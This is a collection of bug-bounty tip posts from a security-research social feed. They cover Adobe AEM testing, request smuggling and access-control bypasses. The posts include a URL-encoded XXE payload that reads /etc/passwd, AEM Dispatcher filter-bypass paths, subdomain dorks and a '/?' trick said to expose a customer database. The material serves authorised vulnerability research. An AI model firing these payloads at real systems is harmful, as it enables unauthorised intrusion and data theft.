Cyber Crime NEWS

[+] Linkedin XSS vulnerability affecting 40+ domains... youtu.be/VwLSUHNhrOw #AEMSecurity #bugbountytips

Full advisory URL: github.com/froxlor/Froxlo…

[+] CVE-2024-34070 NXTL Solutions offensive security team is dedicated to securing cyberspace with advanced vulnerability research. Recently dicovered a critical Blind XSS vulnerability > Froxlor leading to potential app compromise. #Bugbountytips #NXTLSolutions #bugbountytip

AEM guideContainer XXE? guideState={"guideState"%3a{"guideDom"%3a{},"guideContext"%3a{"xsdRef"%3a"","guidePrefillXml"%3a"<%3fxml+version%3d\"1.0\"+encoding%3d\"utf-8\"%3f><!DOCTYPE+afData+[<!ENTITY+a+SYSTEM+\"file%3a///etc/passwd\">]><afData>%26a%3b</afData>"}}} #AEMSecurity

Giving back to the community is a core part of who we are. This month, our team hosted free #SecureCoding workshops for local developers, promoting safer code practices across the UAE. Together, we can raise the bar for security standards! #NXTLSolutions #CyberSecurity

[+] Using Google dorks for unique subdomains? Try this: site:*-*-*.yourtarget.com site:*-*.*.yourtarget.com site:*.*.*.yourtarget.com #bugbountytips #bugbountytip #AEMSecurity

[+] HTTP Request Smuggling: Recently while playing with HTTP Request Smuggling I came across an instance where the usual HTTP verbs e.g. POST, HEAD etc did not have any affect However using "TEST" as HTTP verb <--- worked and resulted in two different headers in the HTTP response anyone else experienced this ever? #bugbountytips #AEMSecurity #bugbountytip

[+] Dont ignore those out of scope domains! Recently, I saw an application. This domain was listed as out of scope unfortunately.. More recon on target assets, I noticed very same application hosted on an IP owned by the same org Result: 4 IDOR's, 4 SXSS's #bugbountytips

POC: https://targetdomain/api/endpoint <-- Access Denied https://targetdomain/api/endpoint/? <--- Access to entire customer database

[+] FIlter bypass techniques: Sometimes you can do amazing things just by appending /? to bypass access control restrictions ;) #AEMSecurity #FilterBypass #bugbountytips #bugbountytip

[+] Another awesome Adobe AEM Dispatcher filter bypass technique? oh okay Hunting for JSON GET Servlet on /content.1.json however result = 404? Try this: /conten/.1.json /conten/t.1.json /content.tidy.1.json /conten/.tidy.infinity.json #AEMSecurity #bugbountytips #pentesting

Amazed to see CVE-2016-0956 Apache Sling POST Servlet vulnerability discovered back in 2014 still works!!!!!! #AEMSecurity #bugbountytips #bugbountytips

@CyberCrimeNEWS @PunjabPolicePaK @CcpoLahore @aryofficialurdu @etribune @dawn_com @DunyaNews @92newschannel @city42 @ARYNEWSOFFICIAL @geonews_urdu @92newschannel @ExpressNewsPK @Dawn_News @PTVNewsOfficial @24NewsHD

Be careful when visiting websites blindly!!! Just noticed this website that is probably compromised from before and is right now spreading malicious viruses/trojans to whoever visits it... #stayvigilant #cybersecurity #awareness #cybercrimenews

5 RCEs in npm for $15,000 robertchen.cc/blog/2021/09/2…

#bugbounty Have you ever faced this situation where you thought it was a "CRIT" however triager declares it as a "LOW"??? youtube.com/watch?v=njO8mm…

[+] #bugbountytips You really need to analyze logs manually via "Logger" when Using Burp Suite. I confirmed 4 HTTP Request smuggling issues + 2 SSRF's and these issues were not flagged by Burp scanner so yup! see what I mean? #AEMSecurity #bugbountytip

[+] Exclusive! Thank you @salesforce #bugbountytips #swag

Thanks to @0ang3el & @AEMSecurity for sharing their research with us. @ThisIsDK999 has very good knowledge about AEM Testing, if you stuck somewhere, you can ask him like I did. In case I've missed any other resources, please drop them below.

@Bugcrowd @Six2dez1 ReconFTW @pdiscoveryio tools @KN0X55 @owaspamass @TomNomNom tools @BurpBounty @Sn1perSecurity @shmilylty oneforall @_maurosoria dirsearch @AEMSecurity tools @Random_Robbie tools @1ndianl33t tools @iamthefrogy tools @mazen160 tools @FindomainApp @gwendallecoguic tools